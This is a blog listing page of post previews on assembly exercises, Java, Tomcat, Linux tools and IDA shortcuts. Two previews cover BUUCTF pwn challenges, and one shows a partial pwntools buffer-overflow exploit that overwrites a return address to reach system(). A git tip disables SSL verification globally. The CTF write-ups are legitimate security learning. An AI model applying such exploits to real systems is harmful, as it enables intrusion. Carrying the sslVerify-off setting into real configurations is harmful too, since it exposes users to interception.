- 博客(37)
- 收藏
- 关注
RSS订阅原创 Buuctf之2018_rop
经过在ida中搜索,发现既没有system函数也没有bin/sh字符串,所以要想办法泄露出libc函数的地址来得到libc版本,找到system函数和bin/sh地址偏移.发现main函数中调用了两个函数。在第二个调用函数中发现了溢出点.
2023-01-01 22:01:56
172
原创 汇编实验从键盘接收两个不大于 5 的十进制数字,并以十进制数据形式显示其和。从键盘接收一个字符串(假定输入字符串长度大于 3),试换行输出该字符串中第二个字符开始的连续 2 个字符。
汇编实验,从键盘接收两个不大于5的十进制数字,并以十进制数据形式显示其和。
2022-12-31 12:35:08
558
原创 idea中导入maven项目并运行
当我们从网上下载人家的maven项目该怎样导入并运行呢,请看如下步骤。6. 如果右边的某些项是红色的,点击右边的maven进行下载。7.8. 名字部分把后边多余的部分删除,只留下和项目名称相同的部分9. Apply10. 找到Edit Configuration,添加Tomcat
2022-12-04 16:44:06
4574
2
原创 从键盘接收若干个 N 位的十进制数值(0~65535),并以二进制、十进制、 十六进制三种数制形式显示其和
从键盘接收若干个 N 位的十进制数值(0~65535),并以二进制、十进制、十六进制三种数制形式显示其和
2022-11-23 20:29:56
447
原创 如何正确、安全、干净地卸载Tomcat以及Eclipse中Tomcat的配置
卸载并安装tomcat后遇到的各种问题以及eclipse中的tomcat的配置
2022-09-08 23:56:36
4225
原创 ELGamal公钥密码算法代码实现C++
#include<iostream>#include <cstdlib>#include <cmath>using namespace std;int pow_mod(int a, int b, int p); //pow and mod运算 --核心 a的b次方mod p void encryption(int m, int pub_key, int p, int g, int* c1, int* c2); //加密算法 //m--密文 pub--..
2022-05-22 15:49:53
1544
1
原创 Android studio中git相关命令
提交时显示OpenSSL错误git config --global http.sslVerify “false”取消代理git config --global --unset https.proxy查看用户名git config user.name查看用户emailgit config user.email配置全局用户名git config --global user.name “xxx”配置全局emailgit config --global user.email “xxx@xxx.
2022-05-18 15:23:24
609
原创 Buuctf之pwn
1.pwn1from pwn import *log_level = 'debug'elf = ELF("./pwn1")local = 0if local: r = process("./pwn1")else: r = remote("node4.buuoj.cn",29317)bin_sh = 0x000000000040118Asystem_addr = 0x0000000000401191payload = b'a'*0x0F + p64(system_addr) +
2022-05-07 09:41:20
646
原创 顺序表的基本操作
实验要求:编程实现顺序表的以下基本操作:建立顺序表,修改顺序表,插入顺序表,删除顺序表。采用顺序表结构编程实现:两个集合的运算:交集/并集/差集。实验目的:通过该实验,深入理解顺序表的逻辑结构、物理结构等概念,掌握顺序表基本操作的编程实现,注意顺序表插入、删除等操作过程中数据元素的移动现象,培养学生编写程序时,要考虑程序的强壮性,熟练掌握通过函数参数返回函数结果的办法。实验内容:编程实现顺序表下教材第二章定义的线性表的基本操作,最好用菜单形式对应各个操作,使其编程一个完整的小软件。参考界面
2022-03-22 21:44:48
558
原创 IDA常用快捷键
a: 将数据转换为字符串d: 将代码转换成数据c: 将数据转换为代码esc:回退键,能够倒回上一步操作的视图(只有在反汇编窗口才是这个作用,如果是在其他窗口按下esc,会关闭该窗口)shift+f12:可以打开string窗口,一键找出所有的字符串,右击setup,还能对窗口的属性进行设置ctrl+w: 保存ida数据库ctrl+s:选择某个数据段,直接进行跳转ctrl+鼠标滚轮: 能够调节流程试图的大小x: 对着某个函数\变量按该快捷键,可以查看它的交叉引用g: 直接跳转到某个地址n.
2022-03-19 20:15:52
1537
原创 Buuctf pwn1_sctf_2016
checksecrunida在程序中搜索既没有system又没有bin/sh,所以明显的ropnptr处可以使用整数溢出构造rop然后可以利用printf函数来泄露程序的libc版本覆盖返回地址执行system来getshellexpfrom pwn import *from LibcSearcher import *context(os = 'linux', arch = 'i386', log_level = 'debug')elf = ELF("./pwn2")loca
2022-03-19 20:11:05
425
原创 汇编从键盘接受若干个一位十进制数值,并以十进制数据形式显示其和
题目:从键盘接收若干个一位十进制数值(0~9),并以十进制数据形式显示其和。要求:(1)用子程序实现一位十进制数值的输入;(2)当用户未输入数值,直接回车时,结束输入;(3)输出的数据为多位十进制数据,而机器内部计算的和是十六进制形式,需要进行数制转换,然后以字符串的形式输出结果;(4)程序中要求有必要的提示信息。DATA SEGMENT STR1 DB 0AH,0DH,"Please input a number: $" STR2 DB 0AH,0DH,"The sum is: $
2021-11-22 15:20:32
1967
18
原创 安装objdump
objdump是binutils下的工具所以我们要下载binutils这个包下面给出地址http://ftp.gnu.org/gnu/binutils/我下载的是2.37.tar.gz下载后解压缩,然后进入解压后文件所在的那个目录下,执行下列命令./configuremakesudo make install静等命令执行完就安装好了,又安装好一个工具,撒花撒花。...
2021-08-23 18:41:47
5899
原创 Ubuntu中socat安装
为了防止自己某天把Ubuntu系统玩儿崩,还是把自己曾经安装工具的过程给记录下来。(有些工具没写博客,以后慢慢更新,嘻嘻。)首先附上官方链接:socat官方链接其实进入官方链接便可以下载,我下载的版本是1.7.4.1,链接点击直接下载压缩包命令为`tar xzf socat.tar.gzcd socat-1.7.3.0./configuremakesudo make install `这样就安装好了,哈哈。so easy...
2021-08-23 18:04:05
2440
原创 Linux之处理目录的命令
处理目录的常用命令ls (list files) :列出目录及文件名cd (change directory):切换目录pwd (print work directory):显示当前目录mkdir (make directory):创建一个新的目录rmdir (remove directory):删除一个空的目录cp (copy file):复制文件或目录rm(remove):删除文件或目录mv (movefile):移动文件与目录,或修改文件与目录的名称ls(列出目录)-a:全
2021-08-07 09:30:27
74
原创 Ubuntu安装pwntools工具(超详细)
因为要写pwn题,所以准备安装pwntools工具,于是搜了几篇博文,着手安装,但是大多数博文都不太详细,而且有的非常混乱,更严重的是出现了少许错误,导致我安装了整整半天时间,也没安好,因为我是在虚拟机上安装的,最后的结果是把Ubuntu系统删除,重新搭建虚拟机,一切重新开始,好在最后终于安装成功了,所以想写一篇博文,记录以下自己的安装过程。
2021-08-03 10:42:40
4035
11
原创 汇编基础知识
汇编语言的组成 汇编指令(机器码的助记符) 伪指令(由编译器执行) 其他符号(由编译器识别) 汇编语言的核心是汇编指令,它决定了汇编语言的特性。 存储器 CPU是计算器的核心部件,它控制整个计算机的运作并进行1运算,要想让一个CPU互作,就必须向它提供指令和数据。 指令和数据在存储器中存放,也就是平时所说的内存。存储器被划分为若干个存储单元,每个存储单元从0开始顺序编号。1KB = 1024B1MB = 10...
2021-07-24 16:59:28
133
原创 JAVA异常机制
Exception 异常指程序运行中出现的不期而至的各种状况,如:文件找不到、网络连接失败、非法参数等 异常发生在程序运行期间,它影响了正常的程序执行流程。 异常分类 检查性异常:最具代表性的检查性异常是用户错误或问题引起的异常,这是程序员无法预见的。例如要打开一个不存在的文件时,一个异常就发生了,这些异常不能被简单地忽略。 运行时异常:可以在编译时被忽略 错误:错误不是异常。错误在代码中通常被忽略。例如,当栈溢出时,一个错误就...
2021-07-23 18:14:51
67
原创 面向过程&面向对象
面向过程&面向对象 面向过程思想 步骤清晰简单,第一步做什么,第二步做什么... 面向过程适合处理一些较为简单的问题 面向对象思想 物以类聚,分类的思维模式,思考问题首先会解决问题需要哪些分类,然后对这些分类进行单独思考。最后,才对某个分类下的细节进行面向过程的思索。 面向对象适合处理复杂的问题,适合处理需要多人协作的问题 对于描述复杂的事物,为了宏观上把握、从整体进行合理分析,我们需要使用面向对象的思路来分析整个...
2021-07-22 21:29:11
91
原创 Java方法
什么叫做方法 Java方法是语句的集合,它们在一起执行一个功能。 方法是解决一类问题的步骤的有序组合 方法包含于类或对象中 方法在程序中被创建,在其他地方被引用 设计方法的原则:方法的本意是功能块,就是实现某个功能的语句块的集合。 我们设计方法的时候,最好保持方法的原子性, 就是一个方法只能完成一个功能,这样有利于我们后期的拓展。 方法的定义 Java的方法类似于其他语言的函数,是一段 用...
2021-07-18 16:56:54
54
原创 怎样使用JDK执行Java文件
HelloWorld随便新建一个文件夹,存放代码新建一个java文件文件后缀名为.javaHello.java[注意点]系统可能没有显示文件后缀名,需要手动打开,点击查看,显示文件扩展名编写代码打开cmd命令窗口,进入Java 文件所在路径,输入javac空格文件名,生成class文件输入java空格文件名不加后缀,执行代码,运行成功...
2021-07-17 09:53:20
2674
1
原创 虚拟机快捷键
Ctrl+B 开机Ctrl+E 关机Ctrl+R 重启Ctrl+Z 挂起Ctrl+N 新建一个虚拟机Ctrl+O 打开一个虚拟机Ctrl+Alt 返回正常(窗口)模式,鼠标键盘返回到本机vmware中Ctrl+G 鼠标和键盘焦点返回到虚拟机系统中Ctrl+Alt+Enter 进入全屏模式Ctrl+Alt+Insert 退出全屏Ctrl+Alt+Tab 当鼠标和键盘焦点在虚拟机中时,在打开的虚拟机中切换Ctrl+Tab 当鼠标和键盘焦点不在...
2021-07-16 14:03:54
7605
转载 strcpy
题目:已知strcpy函数的原型是:char * strcpy(char * strDest,const char * strSrc);1.不调用库函数,实现strcpy函数。2.解释为什么要返回char *。(一)高质量c++编程上的答案五、编写strcpy函数(10分)已知strcpy函数的原型是 char *strcpy(char *strDest, const char *strSrc); 其中strDest是目的字符串,strSrc是源字符串。(1)不调用C++/C
2021-05-09 21:20:09
2582
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人